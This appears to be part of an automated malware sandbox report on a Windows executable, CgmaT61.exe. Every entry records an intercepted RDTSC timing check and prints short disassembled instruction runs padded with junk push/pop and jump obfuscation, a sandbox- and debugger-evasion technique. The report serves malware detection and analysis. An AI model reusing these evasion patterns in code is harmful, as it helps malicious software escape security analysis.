Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC14E2 second address: CC14E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC14E8 second address: CC14EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CBFC55 second address: CBFC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CBFF2E second address: CBFF33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC01E2 second address: CC01E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC01E8 second address: CC01F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC0353 second address: CC0360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FD32D43E2A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC0C6B second address: CC0C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CBF240 second address: CBF244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC7ADE second address: CC7AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC7AE9 second address: CC7B09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jng 00007FD32D43E2B1h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CD7F22 second address: CD7F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FD32CC50B96h 0x0000000c jg 00007FD32CC50B96h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CD7F38 second address: CD7F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CD7F40 second address: CD7F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007FD32CC50BA2h 0x0000000b jnl 00007FD32CC50B96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE0561 second address: CE056F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD32D43E292h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE508E second address: CE5094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE5094 second address: CE5099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE5099 second address: CE50A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD32CC50BA2h 0x00000008 jo 00007FD32CC50B96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE50A9 second address: CE50CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD32D43E2ACh 0x0000000c jmp 00007FD32D43E296h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CE50CE second address: CE50D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAF1F second address: CEAF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAF26 second address: CEAF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD32CC50BA3h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAD41 second address: CEAD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD32D43E286h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD32D43E293h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAD62 second address: CEAD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAD6F second address: CEAD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEAD73 second address: CEADB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD32CC50BA8h 0x00000010 jmp 00007FD32CC50B9Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CEADB5 second address: CEADCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E296h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF1EFE second address: CF1F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD32CC50B96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF1F08 second address: CF1F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF1F0C second address: CF1F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF1F12 second address: CF1F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD32D43E294h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF20B5 second address: CF20B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF20B9 second address: CF20C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF2230 second address: CF2234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF2234 second address: CF223A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF223A second address: CF224F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD32CC50B9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF23BA second address: CF23C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF23C3 second address: CF23C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF2516 second address: CF251B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF251B second address: CF2522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF26BA second address: CF26C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF30D0 second address: CF30E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF30E9 second address: CF30F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD32D43E286h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF8E19 second address: CF8E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF8E1F second address: CF8E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32D43E299h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF8E3C second address: CF8E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD32CC50BA5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CF8E5B second address: CF8E7A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD32D43E288h 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD32D43E286h 0x00000010 jmp 00007FD32D43E28Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D16CFB second address: D16D05 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD32CC50B9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D18D85 second address: D18D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D18D8B second address: D18DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007FD32CC50B96h 0x0000000c jmp 00007FD32CC50BA8h 0x00000011 jmp 00007FD32CC50BA2h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D188CE second address: D188F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD32D43E295h 0x00000008 jmp 00007FD32D43E28Dh 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jnp 00007FD32D43E28Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2DD2D second address: D2DD4A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD32CC50B9Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jnl 00007FD32CC50B96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2DD4A second address: D2DD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2DD4F second address: D2DD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD32CC50B96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2CF89 second address: D2CF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2CF91 second address: D2CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D2D272 second address: D2D27C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD32D43E286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D3065F second address: D30674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jl 00007FD32CC50BA4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FD32CC50B96h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D339C3 second address: D339C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: D339C9 second address: D339CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C54109 second address: C5410F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C542BE second address: C542C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B08D9 second address: 53B08EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32D43E28Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B08EB second address: 53B0935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bl, 5Eh 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e jmp 00007FD32CC50B9Ch 0x00000023 mov di, cx 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD32CC50BA3h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0935 second address: 53B09A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD32D43E28Fh 0x00000009 or si, E9FEh 0x0000000e jmp 00007FD32D43E299h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FD32D43E28Ah 0x00000020 xchg eax, esi 0x00000021 jmp 00007FD32D43E290h 0x00000026 lea eax, dword ptr [ebp-04h] 0x00000029 jmp 00007FD32D43E290h 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B09A3 second address: 53B09A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B09A7 second address: 53B09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B09C4 second address: 53B09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B09CA second address: 53B0A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD32D43E28Fh 0x00000013 adc esi, 374AA42Eh 0x00000019 jmp 00007FD32D43E299h 0x0000001e popfd 0x0000001f jmp 00007FD32D43E290h 0x00000024 popad 0x00000025 nop 0x00000026 pushad 0x00000027 jmp 00007FD32D43E28Dh 0x0000002c popad 0x0000002d push dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD32D43E28Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0B1C second address: 53B0B31 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 0B228A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, dx 0x00000012 push ebx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53B0B31 second address: 53A0016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007FD32D43E290h 0x0000000f leave 0x00000010 jmp 00007FD32D43E290h 0x00000015 retn 0004h 0x00000018 nop 0x00000019 sub esp, 04h 0x0000001c xor ebx, ebx 0x0000001e cmp eax, 00000000h 0x00000021 je 00007FD32D43E3EFh 0x00000027 mov dword ptr [esp], 0000000Dh 0x0000002e call 00007FD331D5F345h 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD32D43E290h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0016 second address: 53A001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A001A second address: 53A0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0020 second address: 53A0054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD32CC50B9Ch 0x00000008 mov si, 7A01h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD32CC50B9Ch 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD32CC50B9Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0054 second address: 53A005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A005A second address: 53A009A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, A0h 0x00000011 pushfd 0x00000012 jmp 00007FD32CC50BA4h 0x00000017 sub cx, 6BD8h 0x0000001c jmp 00007FD32CC50B9Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A009A second address: 53A00E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD32D43E28Eh 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 jmp 00007FD32D43E28Dh 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A00E0 second address: 53A00F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A00F3 second address: 53A016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD32D43E298h 0x00000013 and cx, B558h 0x00000018 jmp 00007FD32D43E28Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FD32D43E298h 0x00000024 and cx, BFB8h 0x00000029 jmp 00007FD32D43E28Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD32D43E295h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A016D second address: 53A018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD32CC50BA1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A018B second address: 53A019E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CB8Eh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A019E second address: 53A01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01A2 second address: 53A01B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E28Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01B0 second address: 53A01B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01B6 second address: 53A01BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01E1 second address: 53A01E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01E7 second address: 53A01EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A01EB second address: 53A0226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007FD32CC50BA4h 0x00000012 sub edi, edi 0x00000014 jmp 00007FD32CC50BA1h 0x00000019 inc ebx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov bx, ax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: 53A0226 second address: 53A0298 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD32D43E296h 0x00000008 and eax, 3F684528h 0x0000000e jmp 00007FD32D43E28Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FD32D43E298h 0x0000001c and ecx, 224D7788h 0x00000022 jmp 00007FD32D43E28Bh 0x00000027 popfd 0x00000028 popad 0x00000029 test al, al 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FD32D43E295h 0x00000032 rdtsc
